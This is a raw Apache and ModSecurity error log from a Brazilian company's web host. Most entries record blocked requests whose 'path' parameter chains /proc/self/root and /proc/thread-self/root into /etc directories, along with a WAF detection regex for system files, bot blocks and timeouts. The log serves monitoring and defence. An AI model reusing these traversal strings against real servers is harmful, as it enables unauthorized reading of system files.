[Wed Mar 18 02:56:02.525604 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:39608] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-cta6ubjKNq_cu4ZObgAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 02:56:06.554850 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.243.128:53940] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-dgkwaGbbGflqUZDL8QAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 02:56:23.133804 2026] [proxy_fcgi:error] [pid 19507:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:56030] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:56:28.966900 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.243.128:53944] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-jCmAPhZkrhU8w4knPAAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 02:56:45.105982 2026] [proxy_fcgi:error] [pid 15051:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:56298] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:56:46.611175 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:43112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo-nvu8EFLIOrSqIpvAZgAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 02:57:06.140671 2026] [proxy_fcgi:error] [pid 26799:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:56562] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:57:29.126869 2026] [proxy_fcgi:error] [pid 30077:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:56860] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:57:51.141839 2026] [proxy_fcgi:error] [pid 19507:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:57130] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:58:13.365809 2026] [proxy_fcgi:error] [pid 11816:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:57452] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:58:27.997417 2026] [core:alert] [pid 17653:tid 140411716749056] [client 74.7.243.128:54964] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/lib/firmware
[Wed Mar 18 02:58:35.137845 2026] [proxy_fcgi:error] [pid 11816:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:57698] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:58:57.158636 2026] [proxy_fcgi:error] [pid 19507:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:57942] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:59:19.120787 2026] [proxy_fcgi:error] [pid 31803:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:58172] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 02:59:41.141148 2026] [proxy_fcgi:error] [pid 29882:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:58424] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:00:02.099685 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.243.128:35760] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo_YNY0UrI5A3LftIxIvQAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:00:03.171119 2026] [proxy_fcgi:error] [pid 31803:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:58674] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:00:24.102096 2026] [proxy_fcgi:error] [pid 17653:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:58972] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:00:46.138914 2026] [proxy_fcgi:error] [pid 19507:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:59232] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:00:57.026322 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.241.31:35336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo_l9Y0UrI5A3LftIxI2wAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:01:09.129781 2026] [proxy_fcgi:error] [pid 30077:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:59460] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:01:32.565810 2026] [proxy_fcgi:error] [pid 30077:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:59660] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:01:36.062042 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.244.43:52952] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abo_wAkwaGbbGflqUZDMhgAAANQ"]
[Wed Mar 18 03:01:36.596300 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:46054] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo_wNa6ubjKNq_cu4ZOyAAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:01:46.611669 2026] [:error] [pid 11816:tid 140411666392832] [client 74.7.228.61:35916] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abo_yuw_le52K8_3pV2Y2QAAAgk"]
[Wed Mar 18 03:01:55.057816 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:59962] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:02:08.637534 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.241.31:51134] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo_4NY0UrI5A3LftIxI8gAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:02:17.057851 2026] [proxy_fcgi:error] [pid 30077:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60166] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:02:25.838675 2026] [:error] [pid 29882:tid 140411624429312] [client 74.7.241.31:47336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abo_8UzinOy1jxa1j4fK0AAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:02:39.121798 2026] [proxy_fcgi:error] [pid 30077:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:60386] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:02:42.592397 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.241.31:45676] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpAAgkwaGbbGflqUZDMmgAAANc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:03:01.125788 2026] [proxy_fcgi:error] [pid 31803:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:60562] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:03:23.057832 2026] [proxy_fcgi:error] [pid 29882:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:60780] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:03:26.779109 2026] [mime_magic:error] [pid 11816:tid 140411540502272] (70014)End of file found: [client 74.7.243.128:49010] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/systemd
[Wed Mar 18 03:03:26.779299 2026] [access_compat:error] [pid 11816:tid 140411540502272] [client 74.7.243.128:49010] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/systemd
[Wed Mar 18 03:03:35.190970 2026] [:error] [pid 17653:tid 140411708356352] [client 74.7.241.31:46156] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpAN8df6f5d65gmYZSJvAAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:03:45.132119 2026] [proxy_fcgi:error] [pid 31803:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:32788] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:03:50.475223 2026] [:error] [pid 11816:tid 140411658000128] [client 74.7.241.31:35734] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpARuw_le52K8_3pV2ZIwAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:04:09.625880 2026] [proxy_fcgi:error] [pid 15826:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:33068] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:04:10.746804 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.241.31:33110] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpAWuoXxyEfFpUF8f8mWwAAAUw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:04:32.057816 2026] [proxy_fcgi:error] [pid 29882:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:33326] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:04:33.130826 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.241.31:60356] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpAceyqAr6etmhZHNpxZgAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:04:54.085844 2026] [proxy_fcgi:error] [pid 29882:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:33604] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:05:16.137903 2026] [proxy_fcgi:error] [pid 15826:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:33862] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:05:38.057900 2026] [proxy_fcgi:error] [pid 26799:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:34114] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:06:00.134689 2026] [proxy_fcgi:error] [pid 11816:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:34426] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:06:23.242186 2026] [proxy_fcgi:error] [pid 15826:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:34680] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:06:37.340561 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.244.43:54398] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpA7SmAPhZkrhU8w4knxwAAAI0"]
[Wed Mar 18 03:06:41.036581 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.228.61:37518] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpA8SmAPhZkrhU8w4knyAAAAJA"]
[Wed Mar 18 03:06:41.817568 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.243.128:42438] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpA8UzinOy1jxa1j4fLdAAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:06:47.137789 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:34962] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:06:56.538640 2026] [mime_magic:error] [pid 31803:tid 140411624429312] (70014)End of file found: [client 74.7.243.128:41002] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/lib
[Wed Mar 18 03:07:08.129815 2026] [proxy_fcgi:error] [pid 15826:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:35208] AH01075: Error dispatching request to : (polling)
